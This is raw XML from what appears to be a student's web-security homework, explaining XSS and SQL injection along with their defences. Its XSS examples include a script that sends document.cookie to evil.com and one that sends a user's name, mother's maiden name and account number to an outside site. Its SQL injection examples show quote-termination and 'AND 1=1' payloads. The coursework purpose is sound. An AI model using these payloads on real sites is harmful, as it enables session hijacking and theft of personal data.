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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Khoa T. Nguyen</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Arjun Sethi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Buffer Overflow Vulnerability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Password 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Web Security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a) Cross-site request forgery request (XSRF)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Cross-site scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The attacker uses client side javascript to inject malicious code to the client in a &lt;script&gt;&lt;/script&gt; tag. This script is usually stored in a benign document such as text, forum comment, email messages. The browser will execute this script as a regular javascript. The script will manipulate the DOM, get cookie information or send sensitive information to another web address, or do something bad.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three main types: stored, reflection and DOM-based attack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 injection attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The attacker add some special characters such as semicolon “;” to terminate an SQL code and add his own SQL to do something else. Or the attacker add some conditions such as “AND 1 = 1” (blind SQL injection) which returns everything in the table or error message that contains useful information.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b)Cross-site request forgery request (XSRF)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Cross-site scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In side a regular comment, &lt;p&gt; tag or an email message, the attacker write this:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;script&gt;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window.location="http://evil.com/?cookie=" + document.cookie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 to steal information for a social engineering attack:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>var username = document.getElementById(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A52A2A"/>
        </w:rPr>
        <w:t>"username"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="__DdeLink__6_77357100"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>var motherMaidenName = document.getElementById(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A52A2A"/>
        </w:rPr>
        <w:t>"username"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>var accountNumber = document.getElementById(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A52A2A"/>
        </w:rPr>
        <w:t>"accountNumber"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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window.location=”</w:t>
      </w:r>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:t>http://mysite.com/?username</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>=”+ username + “&amp;motherMaidenName=” + motherMaidenName + “&amp;accountNumber=” + accountNumber”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 injection attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>SELECT 1 from User where name=&lt;username&gt;  AND password=&lt;password&gt;;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injection of admin’;’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>SELECT 1 from User where name=’admin’;’’ AND password=&lt;password&gt;;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GET requests such as: </w:t>
      </w:r>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://example.com/?name</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId4">
        <w:r>
          <w:rPr/>
          <w:t>=&lt;username&gt;&amp;password=&lt;password&gt;</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The attacker can change this to: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://example.com/?name</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId6">
        <w:r>
          <w:rPr/>
          <w:t>=&lt;username&gt;&amp;password=&lt;password&gt; AND  1=1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results in </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>SELECT 1 from User where name=&lt;username&gt;  AND password=&lt;password&gt; AND ‘1’=’1’;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The server might respond with an error page and reveal information.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c)Cross-site request forgery request (XSRF)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Cross-site scripting (XSS)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Never send untrusted data to the browser, but this method is restrictive for a comment board.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Sanitize input, don’t take special characters such as “&lt;”, “&gt;” (unsophisticated user will not send a &lt;script&gt; in a message.)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Use HTML escaping for special characters in untrusted data “&lt;”, “&gt;”, escape javascript or HTML.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 injection attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Use prepared statement. (in Java, C# and other languages) This prevents “AND ‘1’=’1’” attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Escaping all user input. This will escape the “;” character in the input, so the SQL code will break and does not execute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Another solution is only return a response code to the client and keep the error message in the server. This prevents the blind attack.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site.com/?username" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/?name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example.com/?name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2</Pages>
  <Words>398</Words>
  <Characters>2440</Characters>
  <CharactersWithSpaces>2799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2019-05-02T12:41:47Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-02T13:43:29Z</dcterms:modified>
  <cp:revision>18</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>